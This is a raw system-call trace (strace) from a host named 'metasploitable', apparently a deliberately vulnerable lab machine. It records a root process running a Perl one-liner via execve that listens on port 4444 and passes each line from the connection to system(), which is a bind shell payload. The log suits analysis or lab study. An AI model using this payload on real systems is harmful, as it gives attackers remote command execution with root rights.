5907  07:11:18.677596 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d57000

5907  07:11:18.677607 mmap2(0xb7d6b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d6b000

5907  07:11:18.677623 mmap2(0xb7d6d000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d6d000

5907  07:11:18.677637 close(1)          = 0

5907  07:11:18.677663 munmap(0xb7efd000, 29913) = 0

5907  07:11:18.677681 open("/etc/ld.so.cache", O_RDONLY) = 1

5907  07:11:18.677693 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5907  07:11:18.677710 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efd000

5907  07:11:18.677720 close(1)          = 0

5907  07:11:18.677730 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.677745 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5907  07:11:18.677760 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5907  07:11:18.677857 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5907  07:11:18.677876 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4d000

5907  07:11:18.677887 mmap2(0xb7d55000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d55000

5907  07:11:18.677904 close(1)          = 0

5907  07:11:18.677916 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5907  07:11:18.677930 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5907  07:11:18.677945 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5907  07:11:18.678038 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5907  07:11:18.678055 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d42000

5907  07:11:18.678067 mmap2(0xb7d4b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4b000

5907  07:11:18.678083 close(1)          = 0

5907  07:11:18.678104 munmap(0xb7efd000, 29913) = 0

5907  07:11:18.678120 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5907  07:11:18.678134 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5907  07:11:18.678146 _llseek(1, 0, [0], SEEK_CUR) = 0

5907  07:11:18.678158 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5907  07:11:18.678174 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f04000

5907  07:11:18.678185 _llseek(1, 1624, [1624], SEEK_SET) = 0

5907  07:11:18.678201 munmap(0xb7f04000, 1624) = 0

5907  07:11:18.678211 close(1)          = 0

5907  07:11:18.678239 getpgrp()         = 3831

5907  07:11:18.678249 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5907  07:11:18.678265 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5907  07:11:18.678281 brk(0x8101000)    = 0x8101000

5907  07:11:18.678312 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5907  07:11:18.678327 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5907  07:11:18.678351 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5907  07:11:18.678390 brk(0x8102000)    = 0x8102000

5907  07:11:18.678421 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5907  07:11:18.678440 stat64("/sbin/AB", 0xbff48598) = -1 ENOENT (No such file or directory)

5907  07:11:18.678452 stat64("/bin/AB", 0xbff48598) = -1 ENOENT (No such file or directory)

5907  07:11:18.678464 stat64("/usr/sbin/AB", 0xbff48598) = -1 ENOENT (No such file or directory)

5907  07:11:18.678475 stat64("/usr/bin/AB", 0xbff48598) = -1 ENOENT (No such file or directory)

5907  07:11:18.678489 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5907  07:11:18.678503 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d786f8) = 5908

5908  07:11:18.678548 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5908  07:11:18.678564 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5908  07:11:18.678577 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5908  07:11:18.678589 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5908  07:11:18.678605 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5908  07:11:18.678620 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5908  07:11:18.678633 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5908  07:11:18.678690 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5908  07:11:18.678704 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5908  07:11:18.678771 exit_group(127)   = ?

5907  07:11:18.703852 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5907  07:11:18.703852 --- SIGCHLD (Child exited) @ 0 (0) ---

5907  07:11:18.703852 waitpid(-1,  <unfinished ...>

4519  07:11:18.703852 waitpid(5907,  <unfinished ...>

5907  07:11:18.703852 <... waitpid resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5908

5907  07:11:18.714572 waitpid(-1, 0xbff48218, WNOHANG) = -1 ECHILD (No child processes)

5907  07:11:18.714589 sigreturn()       = ? (mask now [])

5907  07:11:18.714628 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5907  07:11:18.714643 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5907  07:11:18.714654 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5907  07:11:18.714666 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5907  07:11:18.714685 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5907  07:11:18.714697 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5907  07:11:18.714733 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5907  07:11:18.714753 stat64("/sbin/perl", 0xbff485c8) = -1 ENOENT (No such file or directory)

5907  07:11:18.714766 stat64("/bin/perl", 0xbff485c8) = -1 ENOENT (No such file or directory)

5907  07:11:18.714778 stat64("/usr/sbin/perl", 0xbff485c8) = -1 ENOENT (No such file or directory)

5907  07:11:18.714789 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5907  07:11:18.714807 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5907  07:11:18.714833 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5907  07:11:18.714847 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d786f8) = 5909

5909  07:11:18.714897 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5909  07:11:18.714913 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5909  07:11:18.714926 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5909  07:11:18.714937 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5909  07:11:18.714952 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5909  07:11:18.714967 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5909  07:11:18.714980 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5909  07:11:18.715014 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5909  07:11:18.715168 brk(0)            = 0x8153000

5909  07:11:18.715191 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.715207 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f94000

5909  07:11:18.715223 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.715239 open("/etc/ld.so.cache", O_RDONLY) = 1

5909  07:11:18.715252 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5909  07:11:18.715268 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8c000

5909  07:11:18.715279 close(1)          = 0

5909  07:11:18.715289 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.715304 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5909  07:11:18.715319 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5909  07:11:18.715413 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5909  07:11:18.715430 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f88000

5909  07:11:18.715442 mmap2(0xb7f8a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f8a000

5909  07:11:18.715458 close(1)          = 0

5909  07:11:18.715469 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.715483 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5909  07:11:18.715497 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5909  07:11:18.715659 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5909  07:11:18.715676 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f63000

5909  07:11:18.715688 mmap2(0xb7f86000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f86000

5909  07:11:18.715703 close(1)          = 0

5909  07:11:18.715715 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.715728 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5909  07:11:18.715742 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5909  07:11:18.715827 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5909  07:11:18.715843 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f62000

5909  07:11:18.715856 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f4a000

5909  07:11:18.715867 mmap2(0xb7f5e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f5e000

5909  07:11:18.715881 mmap2(0xb7f60000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f60000

5909  07:11:18.715895 close(1)          = 0

5909  07:11:18.715906 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.715922 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5909  07:11:18.715936 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5909  07:11:18.716022 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5909  07:11:18.716105 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfb000

5909  07:11:18.716133 mmap2(0xb7f44000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f44000

5909  07:11:18.716148 mmap2(0xb7f47000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f47000

5909  07:11:18.716161 close(1)          = 0

5909  07:11:18.716173 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5909  07:11:18.716186 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5909  07:11:18.716200 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5909  07:11:18.716287 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5909  07:11:18.716303 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc9000

5909  07:11:18.716314 mmap2(0xb7dd2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd2000

5909  07:11:18.716328 mmap2(0xb7dd4000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dd4000

5909  07:11:18.716342 close(1)          = 0

5909  07:11:18.716365 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dc8000

5909  07:11:18.716378 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dc88c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5909  07:11:18.716436 mprotect(0xb7f44000, 4096, PROT_READ) = 0

5909  07:11:18.716463 munmap(0xb7f8c000, 29913) = 0

5909  07:11:18.716476 set_tid_address(0xb7dc8908) = 5909

5909  07:11:18.716488 set_robust_list(0xb7dc8910, 0xc) = 0

5909  07:11:18.716498 futex(0xbfdf9a90, 0x81 /* FUTEX_??? */, 1) = 0

5909  07:11:18.716511 rt_sigaction(SIGRTMIN, {0xb7f4e2c0, [], SA_SIGINFO}, NULL, 8) = 0

5909  07:11:18.716551 rt_sigaction(SIGRT_1, {0xb7f4e340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5909  07:11:18.716566 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5909  07:11:18.716581 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5909  07:11:18.716614 uname({sys="Linux", node="metasploitable", ...}) = 0

5909  07:11:18.716659 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5909  07:11:18.716704 brk(0)            = 0x8153000

5909  07:11:18.716713 brk(0x8174000)    = 0x8174000

5909  07:11:18.716756 getuid32()        = 0

5909  07:11:18.716766 geteuid32()       = 0

5909  07:11:18.716775 getgid32()        = 0

5909  07:11:18.716784 getegid32()       = 0

5909  07:11:18.716821 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da7000

5909  07:11:18.716848 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5909  07:11:18.716867 read(1, "\tP\336\242", 4) = 4

5909  07:11:18.716880 close(1)          = 0

5909  07:11:18.716898 time(NULL)        = 1495624278

5909  07:11:18.716939 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfdf9760) = -1 ENOENT (No such file or directory)

5909  07:11:18.716956 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfdf9760) = -1 ENOENT (No such file or directory)

